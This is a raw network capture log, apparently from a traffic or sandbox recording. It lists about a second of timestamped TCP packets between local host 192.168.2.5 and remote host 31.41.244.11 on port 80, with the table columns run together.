                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.704979897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.705020905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.705065966 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.705106974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.706111908 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.706151009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.706279993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.706320047 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.707284927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.707323074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.707384109 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.707423925 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.708460093 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.708503962 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.708585978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.708643913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.709623098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.709664106 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.709666967 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.709705114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.710798025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.710839987 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.710882902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.710927963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.711972952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.712008953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.712094069 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.712133884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.713124037 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.713148117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.713166952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.713186026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.714323044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.714364052 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.714457035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.714498043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.715550900 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.715590954 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.715682030 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.715719938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.716622114 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.716665983 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.716723919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.716766119 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.717767000 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.717806101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.717878103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.717912912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.718857050 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.718897104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850075006 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850126982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850178003 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850214958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850577116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850617886 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850739002 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.850779057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.851751089 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.851790905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.851855993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.851898909 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.852905989 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.852946997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.853008986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.853055954 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.854072094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.854109049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.854171991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.854212046 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.855227947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.855268002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.855350971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.855390072 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.856426001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.856470108 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.856549978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.856595039 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.857588053 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.857629061 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.857748032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.857785940 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.858741999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.858783007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.858825922 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.858865976 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.859920025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.859961033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.859988928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.860027075 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.861071110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.861114025 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.861155987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.861206055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.862164974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.862206936 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.862528086 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.862571001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.863329887 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.863373041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.863394976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.863436937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.864486933 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.864603043 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.864664078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.865644932 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.865688086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.865775108 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.865814924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.866858006 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.866899967 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.867038965 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.867078066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.868005991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.868041992 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.868083954 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.868119955 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.869151115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.869185925 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.869254112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.869298935 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.870330095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.870378017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.870481968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.870518923 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.871535063 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.871573925 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.871651888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.871687889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.872658014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.872699022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.872822046 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.872859001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.873809099 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.873851061 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.874011993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.874047995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.874983072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.875019073 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.875106096 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.875144958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.876138926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.876177073 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.876255035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.876296043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.877332926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.877370119 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.877438068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.877477884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.878468990 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.878510952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.878580093 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.878618002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.879631042 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.879672050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.879723072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.879761934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.880801916 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.880842924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.880887032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.880927086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.881949902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.881989956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.882069111 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.882114887 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.883137941 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.883177996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.883241892 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.883275032 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.884288073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.884319067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.884357929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.884401083 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.885452032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.885494947 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.885524035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.885596991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.886621952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.886663914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.886739016 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.886779070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.887795925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.887835026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.887963057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.888004065 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.888976097 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.889017105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.889136076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.889173985 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.890134096 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.890177965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.890228033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.890268087 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.891272068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.891318083 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.891377926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.891412020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.892443895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.892488956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.892494917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.892534971 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.893614054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.893656969 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.893718004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.893755913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.894788027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.894826889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.894862890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.894902945 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.895946980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.895987034 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.896024942 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.896064043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.897123098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.897165060 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.897197008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.897234917 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.898283005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.898323059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.898408890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.898447990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.899431944 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.899471045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.899522066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.899563074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.900590897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.900629997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.900695086 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.900738001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.901768923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.901809931 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.901830912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.901869059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.902937889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.902977943 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.903027058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.903068066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.904098034 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.904138088 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.904211044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.904254913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.905256987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.905297041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.905366898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.905406952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.906440020 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.906477928 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.906514883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.906554937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.907604933 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.907645941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.907713890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.907756090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.908755064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.908804893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.908847094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.908905029 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.909969091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.910012960 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.910366058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.910408020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.911043882 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.911084890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.042283058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.042377949 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.042588949 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.042634010 CET4982880192.168.2.531.41.244.11
